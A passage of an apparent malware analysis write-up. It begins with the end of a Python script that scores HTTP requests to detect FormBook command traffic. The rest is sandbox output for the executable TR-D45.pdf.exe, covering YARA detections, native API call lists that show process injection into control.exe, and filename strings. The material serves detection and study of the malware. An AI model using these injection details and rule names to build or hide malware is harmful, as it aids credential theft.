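    for raw, body in samples:
        req = parse_request(raw)
        total, reasons = score(req, body)
        if total >= threshold:
            alerts.append((req["headers"].get("host"), campaign_key(req), total, reasons))
    return alerts


if __name__ == "__main__":
    for host, key, total, reasons in analyse(REQUESTS):
        print(f"{host}: score {total} key={key} ({'; '.join(reasons)})")
```

Note that the 403 from 34.102.136.180 that tripped Snort rule 1201 is the server's reply to one of these requests; the response code says nothing about whether the host is a live C2 or one of the decoy domains FormBook cycles through, so the grouping by the shared short value is what links the two hostnames to one infection rather than the response.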

      E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: TR-D45.pdf.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399264 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239071B EnumWindows,NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239877D NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399799 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390A92 NtSetInformationThread,TerminateProcess
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023989D5 NtSetInformationThread,LoadLibraryA
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393721 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239371B NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393787 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023907E7 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023937DC NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023917D1 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023937D3 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023997D7 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02398486 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023915D6 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393A2B NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399A23 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393A7F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399A57 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02391AAA NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399A87 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393AE3 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399B17 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399B53 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393B43 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02397BBE NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393B97 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399B8F NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393BDE NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399BD7 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399837 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393823 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399807 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239387B NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239087B NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239989F NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023998F7 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023998CB NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023908C7 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399933 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239092B NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239397F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023999BB NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393985 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023999F7 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023919D3 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023939D7 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399E07 Nt?ResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02391E85 NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392F0A NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02397FCC NtSetInformationThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399C1F NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399C57 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393C43 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399CB7 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393CC3 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393D1F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399D1F NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399D5F NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393D8B NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399DD3 NtResumeThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02393DCB NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9650 NtQueryValueKey
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A96D0 NtCreateKey
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2AA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9760 NtOpenProcess
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2AA770 NtOpenThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9770 NtSetInformationFile
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9FE0 NtCreateMutant
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2AAD30 NtSetContextThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9560 NtWriteFile
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9A10 NtQuerySection
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9B00 NtSetValueKey
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2AA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9820 NtEnumerateKey
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2AB040 NtSuspendThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A9950 NtQueueApcThread
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044795D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044799A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044796D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044796E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0447B040 NtSuspendThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479820 NtEnumerateKey
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044798F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044798A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479950 NtQueueApcThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479560 NtWriteFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0447AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044799D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_044795F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479A10 NtQuerySection
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479A20 NtResumeThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_04479A80 NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479760 NtOpenProcess,12_2_04479760
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479770 NtSetInformationFile,12_2_04479770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A770 NtOpenThread,12_2_0447A770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479B00 NtSetValueKey,12_2_04479B00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A710 NtOpenProcessToken,12_2_0447A710
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479730 NtQueryVirtualMemory,12_2_04479730
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044797A0 NtUnmapViewOfSection,12_2_044797A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A3B0 NtGetContextThread,12_2_0447A3B0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E70 NtClose,12_2_02459E70
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F20 NtAllocateVirtualMemory,12_2_02459F20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D40 NtCreateFile,12_2_02459D40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459DF0 NtReadFile,12_2_02459DF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E6A NtReadFile,NtClose,12_2_02459E6A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E9B NtClose,12_2_02459E9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F1A NtAllocateVirtualMemory,12_2_02459F1A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D92 NtCreateFile,12_2_02459D92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_00404E8F0_2_00404E8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0040568E0_2_0040568E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E286E301_2_1E286E30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D6161_2_1E32D616
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332EF71_2_1E332EF7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331FF11_2_1E331FF1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33DFCE1_2_1E33DFCE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27841F1_2_1E27841F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D4661_2_1E32D466
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E260D201_2_1E260D20
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332D071_2_1E332D07
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331D551_2_1E331D55
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2925811_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27D5E01_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3325DD1_2_1E3325DD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3322AE1_2_1E3322AE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332B281_2_1E332B28
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29EBB01_2_1E29EBB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32DBD21_2_1E32DBD2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3203DA1_2_1E3203DA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33E8241_2_1E33E824
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3210021_2_1E321002
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A01_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3320A81_2_1E3320A8
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B0901_2_1E27B090
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3328EC1_2_1E3328EC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2841201_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26F9001_2_1E26F900
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_000BD3401_2_000BD340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FD46612_2_044FD466
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F100212_2_044F1002
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444841F12_2_0444841F
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045028EC12_2_045028EC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B09012_2_0444B090
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A012_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045020A812_2_045020A8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501D5512_2_04501D55
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443F90012_2_0443F900
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502D0712_2_04502D07
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04430D2012_2_04430D20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445412012_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045025DD12_2_045025DD
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E012_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446258112_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04456E3012_2_04456E30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502EF712_2_04502EF7
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045022AE12_2_045022AE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502B2812_2_04502B28
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FDBD212_2_044FDBD2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501FF112_2_04501FF1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446EBB012_2_0446EBB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245D34012_2_0245D340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E4012_2_02449E40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E3C12_2_02449E3C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CF8612_2_0245CF86
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245DF9412_2_0245DF94
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442FB012_2_02442FB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D8712_2_02442D87
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D9012_2_02442D90
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: String function: 1E26B150 appears 45 times
      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0443B150 appears 35 times
      Source: TR-D45.pdf.exe, 00000000.00000002.247663244.0000000002250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000000.00000000.228367580.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilename vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.320194787.000000001E4EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000003.313426694.0000000000919000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000000.246411137.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319716219.000000001DDB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319651921.000000001DC60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
